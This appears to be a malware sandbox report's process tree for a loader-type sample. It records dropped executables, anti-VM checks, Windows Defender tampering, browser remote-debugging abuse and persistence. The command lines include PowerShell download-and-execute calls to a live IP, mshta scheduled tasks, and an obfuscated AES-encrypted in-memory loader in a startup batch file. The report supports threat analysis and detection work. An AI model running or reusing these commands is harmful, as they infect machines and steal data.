The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe"C:\Users\Admin\AppData\Local\Temp\5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3404
-
-
C:\Users\Admin\AppData\Local\Temp\1086592101\19e091b2fd.exe"C:\Users\Admin\AppData\Local\Temp\1086592101\19e091b2fd.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn sTuhnmakVbX /tr "mshta C:\Users\Admin\AppData\Local\Temp\jqJjB4p2i.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn sTuhnmakVbX /tr "mshta C:\Users\Admin\AppData\Local\Temp\jqJjB4p2i.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:884
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\jqJjB4p2i.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Users\Admin\AppData\Local\TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE"C:\Users\Admin\AppData\Local\TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1086593021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086593021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "lUqvama6qo9" /tr "mshta \"C:\Temp\x8PejTB6v.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5032
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\x8PejTB6v.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4020
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2756
-
-
C:\Users\Admin\AppData\Local\Temp\1086629001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086629001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:4324 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1660
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 8166⤵
- Program crash
PID:1228
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5836 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 9686⤵
- Program crash
PID:6028
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵
- Executes dropped EXE
PID:552
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6024 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 9686⤵
- Program crash
PID:2960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086680001\d74fb7ce47.exe"C:\Users\Admin\AppData\Local\Temp\1086680001\d74fb7ce47.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1240
-
-
C:\Users\Admin\AppData\Local\Temp\1086681001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086681001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\1086682001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086682001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\1086682001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086682001\7aencsM.exe"4⤵
- Executes dropped EXE
PID:320
-
-
C:\Users\Admin\AppData\Local\Temp\1086682001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086682001\7aencsM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4508 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2896 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9ac28cc40,0x7ff9ac28cc4c,0x7ff9ac28cc586⤵PID:1564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:26⤵PID:1436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2168 /prefetch:36⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:86⤵PID:60
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3100 /prefetch:16⤵
- Uses browser remote debugging
PID:2716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3144 /prefetch:16⤵
- Uses browser remote debugging
PID:4404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3836 /prefetch:16⤵
- Uses browser remote debugging
PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4164 /prefetch:86⤵PID:3044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4700,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:86⤵PID:2984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4868,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4924 /prefetch:86⤵PID:5504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4908,i,17136119522889384021,14389611729837721217,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:86⤵PID:5520
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5444 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9ad7946f8,0x7ff9ad794708,0x7ff9ad7947186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,11096915556195213351,16694592740020941516,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:26⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,11096915556195213351,16694592740020941516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:36⤵PID:5524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,11096915556195213351,16694592740020941516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:86⤵PID:5692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,11096915556195213351,16694592740020941516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:16⤵
- Uses browser remote debugging
PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,11096915556195213351,16694592740020941516,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:16⤵
- Uses browser remote debugging
PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,11096915556195213351,16694592740020941516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:16⤵
- Uses browser remote debugging
PID:1944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,11096915556195213351,16694592740020941516,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:16⤵
- Uses browser remote debugging
PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\x47q1" & exit5⤵PID:5844
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5728
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 9764⤵
- Program crash
PID:3312
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086683001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1086683001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2296
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086684041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
PID:5408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵PID:5468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086685001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086685001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\1086686001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1086686001\qFqSpAp.exe"3⤵
- Executes dropped EXE
PID:2160
-
-
C:\Users\Admin\AppData\Local\Temp\1086687001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086687001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
